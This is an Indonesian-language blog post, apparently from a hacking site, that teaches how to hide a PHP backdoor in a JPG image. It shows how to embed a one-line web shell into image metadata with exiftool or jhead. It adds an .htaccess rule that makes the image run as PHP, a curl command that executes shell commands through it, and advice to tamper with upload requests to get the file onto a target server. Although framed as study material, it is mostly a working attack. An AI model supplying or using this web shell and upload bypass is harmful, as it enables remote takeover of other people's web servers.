0
Home  ›  Pentest  ›  security

Menyisipkan File Backdoor di Dalam File JPG

 


Hallo semua kali ini admin akan memberikan penjelasan serangan menggunakan backdor, namun ini hanya sebuah materi pelajaran. Sebenarnya saya males nulisnya, tapi kebetulan hari ini saya lagi ngak banyak pikiran dan fresh, jadi mau nulis tutorial ini.

Ada banyak metode yang bisa di lakukan untuk menyisipkan backdorr atau pintu belakang, yang sering di lakukan attacker yaitu menyisipkan file hidden namun ini merupakan metode yang dapat di halau. karena file sistem akan langsung merespon da menghapus file tersebut.

Langsung saja ke tutorial. Ada beberapa cara untuk menyisipkan backdoor ke file gambar. Kita akan bahas satu persatu. karena saya juga males jelasin panjang lebar tetang backdoor ini.

Menggunakan Exiftool

Exiftool juga dapat digunakan untuk menyisipkan backdoor kedalam gambar. Caranya cukup masukkan script PHP kedalam file text, lalu sisipkan kedalam gambar menggunakan Exiftool. Jadi pertama buat file php. terserah namnya apa.


Jadi comment perintahnya seperti di bawah ini.
$ exiftool '-comment<=webshell.php' xp.jpg
Nah kalau sudah kalian tinggal upload file ke target.

Menggunakan Jhead

Jika cara di atas kurang di pahami, kamu bisa coba dengan cara kedua yaitu dengan menggunakan tool jhead. tool stagenography yang memiliki fungsi untuk menambahkan comment pada gambar, untuk instalnya copy perintah di bawah ini.
$ sudo apt install jhead -y
Selajutnya hapus metadata yang ada di dalam gambar.
jhead -purejpg xp.jpg
Lalu masukan comment dengan menggunakan perintah.
jhead -ce xp.jpg
Dan masukan simpel backdor seperti di bawah ini.
jhead -ce xp.jpg
Masukan backdoornya.
<?=`{$_REQUEST['asuna']}`?>
Serakarang silahkan coba cek kembali apakah backdoor sudah di sisipi atau belum. Tambahkan file .htaccess didalam direktori tempat gambar berada. Dengan rule berikut:
<Files "xp.jpg">
    <If "%{QUERY_STRING} =~ /cmd=/ || %{REQUEST_METHOD} == 'POST'">
        ForceType application/x-httpd-php
    </If>
</Files>
Sekarang jalakan filenya.
curl http://localhost/backdoor-test/xp.jpg -d 'asuna=uname -a' --output -
Saat mengupluadnya file akan gagal ini karean type file bukan gambar, jadi harus melakukan temper data menjadi ekstensi php.

Maka file sukses terupload.
./X3NUX
Mereka teralu banyak mengusik, maka bunuh dan dan matilah sekarang juga!!!!
Post a Comment
Search
Menu
Theme
Share
Additional JS